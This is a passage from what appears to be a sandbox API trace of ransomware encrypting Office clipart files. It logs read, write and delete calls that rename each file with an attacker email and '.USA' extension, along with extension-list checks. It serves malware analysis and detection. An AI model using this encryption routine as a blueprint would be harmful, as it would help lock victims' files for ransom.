Office\\CLIPART\\PUB60COR\\HH00236_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00236_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.101] GetLastError () returned 0x0 [0272.101] ReadFile (in: hFile=0x3b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xcd6, lpOverlapped=0x0) returned 1 [0272.103] WriteFile (in: hFile=0x2bc, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xce0, lpOverlapped=0x0) returned 1 [0272.104] ReadFile (in: hFile=0x3b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.104] WriteFile (in: hFile=0x2bc, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.104] SetEndOfFile (hFile=0x2bc) returned 1 [0272.104] CloseHandle (hObject=0x2bc) returned 1 [0272.104] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.104] SetEndOfFile (hFile=0x3b4) returned 1 [0272.105] CloseHandle (hObject=0x3b4) returned 1 [0272.106] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.106] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00236_.wmf")) returned 1 [0272.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63 [0272.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63 [0272.107] lstrlenW (lpString=".doc") returned 4 [0272.107] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.107] lstrlenW (lpString=".docx") returned 5 [0272.107] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.107] lstrlenW (lpString=".pdf") returned 4 [0272.107] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.107] lstrlenW (lpString=".xls") returned 4 [0272.107] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.107] lstrlenW (lpString=".xlsx") returned 5 [0272.107] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.107] lstrlenW (lpString=".ppt") returned 4 [0272.107] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63 [0272.107] lstrlenW (lpString=".zip") returned 4 [0272.107] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.107] lstrlenW (lpString=".rar") returned 4 [0272.107] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.107] lstrlenW (lpString=".bz2") returned 4 [0272.107] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.107] lstrlenW (lpString=".7z") returned 3 [0272.107] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63 [0272.107] lstrlenW (lpString=".dbf") returned 4 [0272.107] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63 [0272.107] lstrlenW (lpString=".1cd") returned 4 [0272.107] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63 [0272.107] lstrlenW (lpString=".jpg") returned 4 [0272.107] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63 [0272.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63 [0272.108] lstrlenW (lpString=".doc") returned 4 [0272.108] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.108] lstrlenW (lpString=".docx") returned 5 [0272.108] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.108] lstrlenW (lpString=".pdf") returned 4 [0272.108] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.108] lstrlenW (lpString=".xls") returned 4 [0272.108] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.108] lstrlenW (lpString=".xlsx") returned 5 [0272.108] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.108] lstrlenW (lpString=".ppt") returned 4 [0272.108] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63 [0272.108] lstrlenW (lpString=".zip") returned 4 [0272.108] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.108] lstrlenW (lpString=".rar") returned 4 [0272.108] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.108] lstrlenW (lpString=".bz2") returned 4 [0272.108] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.108] lstrlenW (lpString=".7z") returned 3 [0272.108] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63 [0272.108] lstrlenW (lpString=".dbf") returned 4 [0272.108] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63 [0272.108] lstrlenW (lpString=".1cd") returned 4 [0272.108] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 63 [0272.108] lstrlenW (lpString=".jpg") returned 4 [0272.108] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.109] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.109] lstrlenW (lpString="HH00241_.WMF") returned 12 [0272.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00241_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.109] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=1960) returned 1 [0272.109] CloseHandle (hObject=0x3b4) returned 1 [0272.109] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00241_.wmf")) returned 0x20 [0272.109] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00241_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00241_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.109] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.109] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00241_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.110] GetLastError () returned 0x0 [0272.110] ReadFile (in: hFile=0x3b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x7a8, lpOverlapped=0x0) returned 1 [0272.111] WriteFile (in: hFile=0x2bc, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x7b0, lpOverlapped=0x0) returned 1 [0272.112] ReadFile (in: hFile=0x3b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.112] WriteFile (in: hFile=0x2bc, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.112] SetEndOfFile (hFile=0x2bc) returned 1 [0272.112] CloseHandle (hObject=0x2bc) returned 1 [0272.112] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.112] SetEndOfFile (hFile=0x3b4) returned 1 [0272.114] CloseHandle (hObject=0x3b4) returned 1 [0272.114] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.114] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00241_.wmf")) returned 1 [0272.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63 [0272.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63 [0272.115] lstrlenW (lpString=".doc") returned 4 [0272.115] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.115] lstrlenW (lpString=".docx") returned 5 [0272.115] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.115] lstrlenW (lpString=".pdf") returned 4 [0272.115] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.115] lstrlenW (lpString=".xls") returned 4 [0272.115] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.115] lstrlenW (lpString=".xlsx") returned 5 [0272.115] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.115] lstrlenW (lpString=".ppt") returned 4 [0272.115] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63 [0272.115] lstrlenW (lpString=".zip") returned 4 [0272.116] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.116] lstrlenW (lpString=".rar") returned 4 [0272.116] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.116] lstrlenW (lpString=".bz2") returned 4 [0272.116] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.116] lstrlenW (lpString=".7z") returned 3 [0272.116] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63 [0272.116] lstrlenW (lpString=".dbf") returned 4 [0272.116] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63 [0272.116] lstrlenW (lpString=".1cd") returned 4 [0272.116] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63 [0272.116] lstrlenW (lpString=".jpg") returned 4 [0272.116] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63 [0272.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63 [0272.116] lstrlenW (lpString=".doc") returned 4 [0272.116] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.116] lstrlenW (lpString=".docx") returned 5 [0272.116] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.116] lstrlenW (lpString=".pdf") returned 4 [0272.116] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.116] lstrlenW (lpString=".xls") returned 4 [0272.116] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.116] lstrlenW (lpString=".xlsx") returned 5 [0272.116] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.116] lstrlenW (lpString=".ppt") returned 4 [0272.116] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63 [0272.116] lstrlenW (lpString=".zip") returned 4 [0272.117] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.117] lstrlenW (lpString=".rar") returned 4 [0272.117] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.117] lstrlenW (lpString=".bz2") returned 4 [0272.117] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.117] lstrlenW (lpString=".7z") returned 3 [0272.117] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63 [0272.117] lstrlenW (lpString=".dbf") returned 4 [0272.117] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63 [0272.117] lstrlenW (lpString=".1cd") returned 4 [0272.117] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63 [0272.117] lstrlenW (lpString=".jpg") returned 4 [0272.117] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.117] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.117] lstrlenW (lpString="HH00260_.WMF") returned 12 [0272.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00260_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.118] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=3662) returned 1 [0272.118] CloseHandle (hObject=0x3b4) returned 1 [0272.118] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00260_.wmf")) returned 0x20 [0272.118] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00260_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00260_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.118] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.119] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00260_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.119] GetLastError () returned 0x0 [0272.119] ReadFile (in: hFile=0x3b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xe4e, lpOverlapped=0x0) returned 1 [0272.120] WriteFile (in: hFile=0x2bc, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xe50, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xe50, lpOverlapped=0x0) returned 1 [0272.121] ReadFile (in: hFile=0x3b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.121] WriteFile (in: hFile=0x2bc, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.121] SetEndOfFile (hFile=0x2bc) returned 1 [0272.121] CloseHandle (hObject=0x2bc) returned 1 [0272.121] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.121] SetEndOfFile (hFile=0x3b4) returned 1 [0272.123] CloseHandle (hObject=0x3b4) returned 1 [0272.123] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.123] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00260_.wmf")) returned 1 [0272.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63 [0272.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63 [0272.124] lstrlenW (lpString=".doc") returned 4 [0272.124] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.124] lstrlenW (lpString=".docx") returned 5 [0272.124] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.124] lstrlenW (lpString=".pdf") returned 4 [0272.124] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.124] lstrlenW (lpString=".xls") returned 4 [0272.124] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.124] lstrlenW (lpString=".xlsx") returned 5 [0272.124] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.124] lstrlenW (lpString=".ppt") returned 4 [0272.124] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63 [0272.124] lstrlenW (lpString=".zip") returned 4 [0272.124] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.124] lstrlenW (lpString=".rar") returned 4 [0272.124] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.124] lstrlenW (lpString=".bz2") returned 4 [0272.124] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.124] lstrlenW (lpString=".7z") returned 3 [0272.124] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63 [0272.124] lstrlenW (lpString=".dbf") returned 4 [0272.124] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63 [0272.124] lstrlenW (lpString=".1cd") returned 4 [0272.124] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63 [0272.124] lstrlenW (lpString=".jpg") returned 4 [0272.124] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63 [0272.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63 [0272.125] lstrlenW (lpString=".doc") returned 4 [0272.125] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.125] lstrlenW (lpString=".docx") returned 5 [0272.125] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.125] lstrlenW (lpString=".pdf") returned 4 [0272.125] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.125] lstrlenW (lpString=".xls") returned 4 [0272.125] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.125] lstrlenW (lpString=".xlsx") returned 5 [0272.125] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.125] lstrlenW (lpString=".ppt") returned 4 [0272.125] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63 [0272.125] lstrlenW (lpString=".zip") returned 4 [0272.125] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.125] lstrlenW (lpString=".rar") returned 4 [0272.125] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.125] lstrlenW (lpString=".bz2") returned 4 [0272.125] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.125] lstrlenW (lpString=".7z") returned 3 [0272.125] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63 [0272.125] lstrlenW (lpString=".dbf") returned 4 [0272.125] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63 [0272.125] lstrlenW (lpString=".1cd") returned 4 [0272.125] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63 [0272.125] lstrlenW (lpString=".jpg") returned 4 [0272.125] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.126] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.126] lstrlenW (lpString="HH00276_.WMF") returned 12 [0272.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00276_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.126] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=3016) returned 1 [0272.126] CloseHandle (hObject=0x3b4) returned 1 [0272.126] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00276_.wmf")) returned 0x20 [0272.126] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00276_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00276_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.126] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.126] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00276_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.127] GetLastError () returned 0x0 [0272.127] ReadFile (in: hFile=0x3b4, lpBuffer=0x3bd0020, 